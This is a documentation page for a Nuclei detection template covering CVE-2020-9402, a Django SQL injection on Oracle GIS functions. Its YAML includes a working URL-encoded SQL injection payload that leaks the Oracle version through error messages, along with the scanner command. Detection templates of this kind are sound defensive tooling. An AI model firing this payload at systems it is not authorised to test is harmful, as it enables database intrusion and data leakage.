Skip to content
Nuclei Templates

Django SQL Injection

ID: CVE-2020-9402

Severity: high

Author: geeknik

Tags: cve,cve2020,django,sqli,vulhub,djangoproject

Description

Section titled “Description”

Django 1.11 before 1.11.29, 2.2 before 2.2.11, and 3.0 before 3.0.4 allow SQL injection if untrusted data is used as a tolerance parameter in GIS functions and aggregates on Oracle. By passing a suitably crafted tolerance to GIS functions and aggregates on Oracle, it is possible to break character escaping and inject malicious SQL.

YAML Source

Section titled “YAML Source”
id: CVE-2020-9402


info:
  name: Django SQL Injection
  author: geeknik
  severity: high
  description: Django 1.11 before 1.11.29, 2.2 before 2.2.11, and 3.0 before 3.0.4 allow SQL injection if untrusted data is used as a tolerance parameter in GIS functions and aggregates on Oracle. By passing a suitably crafted tolerance to GIS functions and aggregates on Oracle, it is possible to break character escaping and inject malicious SQL.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.
  remediation: Upgrade to the latest version.
  reference:
    - https://www.debian.org/security/2020/dsa-4705
    - https://github.com/vulhub/vulhub/tree/master/django/CVE-2020-9402
    - https://docs.djangoproject.com/en/3.0/releases/security/
    - https://nvd.nist.gov/vuln/detail/CVE-2020-9402
    - https://groups.google.com/forum/#!topic/django-announce/fLUh_pOaKrY
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 8.8
    cve-id: CVE-2020-9402
    cwe-id: CWE-89
    epss-score: 0.14117
    epss-percentile: 0.95552
    cpe: cpe:2.3:a:djangoproject:django:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: djangoproject
    product: django
    shodan-query: cpe:"cpe:2.3:a:djangoproject:django"
  tags: cve,cve2020,django,sqli,vulhub,djangoproject


http:
  - method: GET
    path:
      - "{{BaseURL}}/?q=20)%20%3D%201%20OR%20(select%20utl_inaddr.get_host_name((SELECT%20version%20FROM%20v%24instance))%20from%20dual)%20is%20null%20%20OR%20(1%2B1"


    matchers:
      - type: word
        words:
          - "DatabaseError at"
          - "ORA-29257:"
          - "ORA-06512:"
          - "Request Method:"
        condition: and
# digest: 4a0a00473045022100ac2dec2da650582be337b7c88032f47811764de4e7b270b5ad51f60ddef32bfe02200a73ebe1aea2eea6fc5c952fb3de2a6f466ee759235082fa36739314a50f23bc:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2020/CVE-2020-9402.yaml"

View on Github